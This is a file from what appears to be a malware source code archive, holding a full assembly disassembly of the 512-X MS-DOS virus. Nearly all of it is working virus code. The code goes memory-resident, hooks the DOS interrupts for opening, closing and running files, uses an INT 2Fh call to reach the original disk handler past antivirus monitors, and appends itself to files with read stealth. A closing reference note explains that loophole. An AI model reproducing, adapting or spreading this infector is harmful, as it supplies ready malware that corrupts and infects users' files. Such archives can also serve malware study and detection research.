MalwareSourceCode/MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.512-x.asm

305 lines
11 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;NAME: 512-X.C-M
;FILE SIZE: 00200h - 512d
;START (CS:IP): 00100h
;CODE END: 00300h
;CODE ORIGIN: 00100h
;DATE: Wed Aug 05 13:56:29 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
H00100: MOV AH,30h ;00100 B430 _0
INT 21h ;2-DOS_Ver ;00102 CD21 _!
MOV SI,0004h ;00104 BE0400 ___
MOV DS,SI ;DS_Chg ;00107 8EDE __
CMP AH,1Eh ;00109 80FC1E ___
LDS AX,[SI+08h] ;0010C C54408 _D_
JB H0011B ;0010F 720A r_
MOV AH,13h ;00111 B413 __
INT 2Fh ;3-Prt_Splr_Ctrl ;00113 CD2F _/
PUSH DS ;00115 1E _
PUSH DX ;00116 52 R
INT 2Fh ;3-Prt_Splr_Ctrl ;00117 CD2F _/
POP AX ;00119 58 X
POP DS ;0011A 1F _
H0011B: MOV DI,00F8h ;0011B BFF800 ___
STOSW ;0011E AB _
MOV AX,DS ;0011F 8CD8 __
STOSW ;00121 AB _
MOV DS,SI ;DS_Chg ;00122 8EDE __
LDS AX,[SI+40h] ;00124 C54440 _D@
STOSW ;00127 AB _
CMP AX,0121h ;00128 3D2101 =!_
MOV AX,DS ;0012B 8CD8 __
STOSW ;0012D AB _
PUSH ES ;0012E 06 _
PUSH DI ;0012F 57 W
JNZ H00139 ;00130 7507 u_
SHL SI,1 ;00132 D1E6 __
MOV CX,0100h ;00134 B90001 ___
REPZ CMPSW ;00137 F3A7 __
H00139: PUSH CS ;00139 0E _
POP DS ;0013A 1F _
JZ H00187 ;0013B 744A tJ
MOV AH,52h ;0013D B452 _R
INT 21h ;2-Rsvd_INT:21h-52h ;0013F CD21 _!
PUSH ES ;00141 06 _
MOV SI,00F8h ;00142 BEF800 ___
SUB DI,DI ;00145 2BFF +_
LES AX,ES:[BX+12h] ;ES_Ovrd ;00147 26C44712 &_G_
MOV DX,ES:[DI+02h] ;ES_Ovrd ;0014B 268B5502 &_U_
MOV CX,0104h ;0014F B90401 ___
REPZ MOVSW ;00152 F3A5 __
MOV DS,CX ;DS_Chg ;00154 8ED9 __
MOV DI,0016h ;00156 BF1600 ___
MOV Word Ptr [DI+6Eh],0121h ;00159 C7456E2101 _En!_
MOV [DI+70h],ES ;0015E 8C4570 _Ep
POP DS ;00161 1F _
MOV [BX+14h],DX ;00162 895714 _W_
MOV DX,CS ;00165 8CCA __
MOV DS,DX ;DS_Chg ;00167 8EDA __
MOV BX,[DI-14h] ;00169 8B5DEC _]_
DEC BH ;0016C FECF __
MOV ES,BX ;ES_Chg ;0016E 8EC3 __
CMP DX,[DI] ;00170 3B15 ;_
MOV DS,[DI] ;DS_Chg ;00172 8E1D __
MOV DX,[DI] ;00174 8B15 __
DEC DX ;00176 4A J
MOV DS,DX ;DS_Chg ;00177 8EDA __
MOV SI,CX ;00179 8BF1 __
MOV DX,DI ;0017B 8BD7 __
MOV CL,28h ;0017D B128 _(
REPZ MOVSW ;0017F F3A5 __
MOV DS,BX ;DS_Chg ;00181 8EDB __
JB H00197 ;00183 7212 r_
INT 20h ;B-TERM_norm:20h ;00185 CD20 _
;---------------------------------------------------
H00187: MOV SI,CX ;00187 8BF1 __
MOV DS,[SI+2Ch] ;DS_Chg ;00189 8E5C2C _\,
LODSW ;0018C AD _
DEC SI ;0018D 4E N
TEST AX,AX ;0018E 85C0 __
JNZ H0018C ;00190 75FA u_
ADD SI,+03h ;00192 83C603 ___
MOV DX,SI ;00195 8BD6 __
H00197: MOV AH,3Dh ;00197 B43D _=
CALL H001B0 ; . . . . . . . . . ;00199 E81400 ___
MOV DX,[DI] ;0019C 8B15 __
MOV [DI+04h],DX ;0019E 895504 _U_
ADD [DI],CX ;001A1 010D __
POP DX ;001A3 5A Z
PUSH DX ;001A4 52 R
PUSH CS ;001A5 0E _
POP ES ;001A6 07 _
PUSH CS ;001A7 0E _
POP DS ;001A8 1F _
PUSH DS ;001A9 1E _
MOV AL,50h ;001AA B050 _P
PUSH AX ;001AC 50 P
MOV AH,3Fh ;001AD B43F _?
RET ;RET_Far ;001AF CB _
;---------------------------------------------------
H001B0: INT 21h ;Indef_INT:21h-AH ;001B0 CD21 _!
JB H001CD ;001B2 7219 r_
MOV BX,AX ;001B4 8BD8 __
PUSH BX ;001B6 53 S
MOV AX,1220h ;001B7 B82012 _ _
INT 2Fh ;3-Prt_Splr_Ctrl ;001BA CD2F _/
MOV BL,ES:[DI] ;ES_Ovrd ;001BC 268A1D &__
MOV AX,1216h ;001BF B81612 ___
INT 2Fh ;3-Prt_Splr_Ctrl ;001C2 CD2F _/
POP BX ;001C4 5B [
PUSH ES ;001C5 06 _
POP DS ;001C6 1F _
ADD DI,+11h ;001C7 83C711 ___
MOV CX,0200h ;001CA B90002 ___
H001CD: RET ;RET_Near ;001CD C3 _
;---------------------------------------------------
STI ;001CE FB _
PUSH ES ;001CF 06 _
PUSH SI ;001D0 56 V
PUSH DI ;001D1 57 W
PUSH BP ;001D2 55 U
PUSH DS ;001D3 1E _
PUSH CX ;001D4 51 Q
CALL H001B6 ; . . . . . . . . . ;001D5 E8DEFF ___
MOV BP,CX ;001D8 8BE9 __
MOV SI,[DI+04h] ;001DA 8B7504 _u_
POP CX ;001DD 59 Y
POP DS ;001DE 1F _
CALL H00211 ; . . . . . . . . . ;001DF E82F00 _/_
JB H0020A ;001E2 7226 r&
CMP SI,BP ;001E4 3BF5 ;_
JNB H0020A ;001E6 7322 s"
PUSH AX ;001E8 50 P
MOV AL,ES:[DI-04h] ;ES_Ovrd ;001E9 268A45FC &_E_
NOT AL ;001ED F6D0 __
AND AL,1Fh ;001EF 241F $_
JNZ H00209 ;001F1 7516 u_
ADD SI,ES:[DI] ;ES_Ovrd ;001F3 260335 &_5
XCHG SI,ES:[DI+04h] ;ES_Ovrd ;001F6 26877504 &_u_
ADD ES:[DI],BP ;ES_Ovrd ;001FA 26012D &_-
CALL H00211 ; . . . . . . . . . ;001FD E81100 ___
MOV ES:[DI+04h],SI ;ES_Ovrd ;00200 26897504 &_u_
LAHF ;00204 9F _
SUB ES:[DI],BP ;ES_Ovrd ;00205 26292D &)-
SAHF ;00208 9E _
H00209: POP AX ;00209 58 X
H0020A: POP BP ;0020A 5D ]
POP DI ;0020B 5F _
POP SI ;0020C 5E ^
POP ES ;0020D 07 _
RET 0002h ;RET_Far:0002h ;0020E CA0200 ___
;---------------------------------------------------
H00211: MOV AH,3Fh ;00211 B43F _?
PUSHF ;00213 9C _
PUSH CS ;00214 0E _
CALL H0023A ; . . . . . . . . . ;00215 E82200 _"_
RET ;RET_Near ;00218 C3 _
;---------------------------------------------------
CMP AH,3Fh ;00219 80FC3F __?
JZ H001CE ;0021C 74B0 t_
PUSH DS ;0021E 1E _
PUSH ES ;0021F 06 _
PUSH AX ;00220 50 P
PUSH BX ;00221 53 S
PUSH CX ;00222 51 Q
PUSH DX ;00223 52 R
PUSH SI ;00224 56 V
PUSH DI ;00225 57 W
CMP AH,3Eh ;00226 80FC3E __>
JZ H0023F ;00229 7414 t_
CMP AX,4B00h ;0022B 3D004B =_K
MOV AH,3Dh ;0022E B43D _=
JZ H00241 ;00230 740F t_
POP DI ;00232 5F _
POP SI ;00233 5E ^
POP DX ;00234 5A Z
POP CX ;00235 59 Y
POP BX ;00236 5B [
POP AX ;00237 58 X
POP ES ;00238 07 _
POP DS ;00239 1F _
H0023A: JMP Word Ptr CS:[0004h]
;Mem_Brch:CS:[0004h];0023A 2EFF2E0400 ._.__
;---------------------------------------------------
H0023F: MOV AH,45h ;0023F B445 _E
H00241: CALL H001B0 ; . . . . . . . . . ;00241 E86CFF _l_
JB H00232 ;00244 72EC r_
SUB AX,AX ;00246 2BC0 +_
MOV [DI+04h],AX ;00248 894504 _E_
MOV Byte Ptr [DI-0Fh],02h ;0024B C645F102 _E__
CLD ;0024F FC _
MOV DS,AX ;DS_Chg ;00250 8ED8 __
MOV SI,004Ch ;00252 BE4C00 _L_
LODSW ;00255 AD _
PUSH AX ;00256 50 P
LODSW ;00257 AD _
PUSH AX ;00258 50 P
PUSH [SI+40h] ;00259 FF7440 _t@
PUSH [SI+42h] ;0025C FF7442 _tB
LDS DX,CS:[SI-50h] ;CS_Ovrd ;0025F 2EC554B0 ._T_
MOV AX,2513h ;00263 B81325 __%
INT 21h ;1-Set_Int_Vctr ;00266 CD21 _!
PUSH CS ;00268 0E _
POP DS ;00269 1F _
MOV DX,0204h ;0026A BA0402 ___
MOV AL,24h ;0026D B024 _$
INT 21h ;Indef_INT:21h-25h ;0026F CD21 _!
PUSH ES ;00271 06 _
POP DS ;00272 1F _
MOV AL,[DI-04h] ;00273 8A45FC _E_
AND AL,1Fh ;00276 241F $_
CMP AL,1Fh ;00278 3C1F <_
JZ H00284 ;0027A 7408 t_
MOV AX,[DI+17h] ;0027C 8B4517 _E_
SUB AX,4F43h ;0027F 2D434F -CO
JNZ H002C3 ;00282 753F u?
H00284: XOR [DI-04h],AL ;00284 3045FC 0E_
MOV AX,[DI] ;00287 8B05 __
CMP AX,CX ;00289 3BC1 ;_
;---------------------------------------------------
DB "r6" ;0028B 7236
;---------------------------------------------------
ADD AX,CX ;0028D 03C1 __
JB H002C3 ;0028F 7232 r2
TEST Byte Ptr [DI-0Dh],04h ;00291 F645F304 _E__
JNZ H002C3 ;00295 752C u,
LDS SI,[DI-0Ah] ;00297 C575F6 _u_
DEC AX ;0029A 48 H
SHR AH,1 ;0029B D0EC __
AND AH,[SI+04h] ;0029D 226404 "d_
JZ H002C3 ;002A0 7421 t!
MOV AX,0020h ;002A2 B82000 _ _
MOV DS,AX ;DS_Chg ;002A5 8ED8 __
SUB DX,DX ;002A7 2BD2 +_
CALL H00211 ; . . . . . . . . . ;002A9 E865FF _e_
MOV SI,DX ;002AC 8BF2 __
PUSH CX ;002AE 51 Q
LODSB ;002AF AC _
CMP AL,CS:[SI+07h] ;CS_Ovrd ;002B0 2E3A4407 .:D_
JNZ H002DD ;002B4 7527 u'
LOOP H002AF ;002B6 E2F7 __
POP CX ;002B8 59 Y
OR Byte Ptr ES:[DI-04h],1Fh
;ES_Ovrd ;002B9 26804DFC1F &_M__
OR Byte Ptr ES:[DI-0Bh],40h
;ES_Ovrd ;002BE 26804DF540 &_M_@
H002C3: MOV AH,3Eh ;002C3 B43E _>
CALL H00213 ; . . . . . . . . . ;002C5 E84BFF _K_
OR Byte Ptr ES:[DI-0Ch],40h
;ES_Ovrd ;002C8 26804DF440 &_M_@
POP DS ;002CD 1F _
POP DX ;002CE 5A Z
MOV AX,2524h ;002CF B82425 _$%
INT 21h ;1-Set_Int_Vctr ;002D2 CD21 _!
POP DS ;002D4 1F _
POP DX ;002D5 5A Z
MOV AL,13h ;002D6 B013 __
INT 21h ;Indef_INT:21h-25h ;002D8 CD21 _!
JMP H00232 ;002DA E955FF _U_
;---------------------------------------------------
H002DD: POP CX ;002DD 59 Y
MOV SI,ES:[DI] ;ES_Ovrd ;002DE 268B35 &_5
MOV ES:[DI+04h],SI ;ES_Ovrd ;002E1 26897504 &_u_
MOV AH,40h ;002E5 B440 _@
INT 21h ;2-Wr_Fl_Hdl ;002E7 CD21 _!
JB H002BE ;002E9 72D3 r_
MOV ES:[DI],SI ;ES_Ovrd ;002EB 268935 &_5
MOV ES:[DI+04h],DX ;ES_Ovrd ;002EE 26895504 &_U_
PUSH CS ;002F2 0E _
POP DS ;002F3 1F _
MOV DL,08h ;002F4 B208 __
MOV AH,40h ;002F6 B440 _@
INT 21h ;2-Wr_Fl_Hdl ;002F8 CD21 _!
JMP Short H002B9 ;002FA EBBD __
;---------------------------------------------------
IRET ;002FC CF _
;---------------------------------------------------
DB "666" ;002FD 363636
;---------------------------------------------------
P00100 ENDP
CODE ENDS
END H00100
;-------------------------------------------------------------------------------
INT 2F - Multiplex - DOS 3.3+ - SET DISK INTERRUPT HANDLER
AH = 13h
DS:DX -> interrupt handler disk driver calls on read/write
ES:BX = address to restore INT 13 to on system halt (exit from root
shell)
Return: DS:DX from previous invocation of this function
ES:BX from previous invocation of this function
Notes: most DOS 3.3+ disk access is via the vector in DS:DX, although a few
functions are still invoked via an INT 13 instruction
this is a dangerous security loophole for any virus-monitoring software
which does not trap this call (at least two viruses are known to use
it to get the original ROM entry point)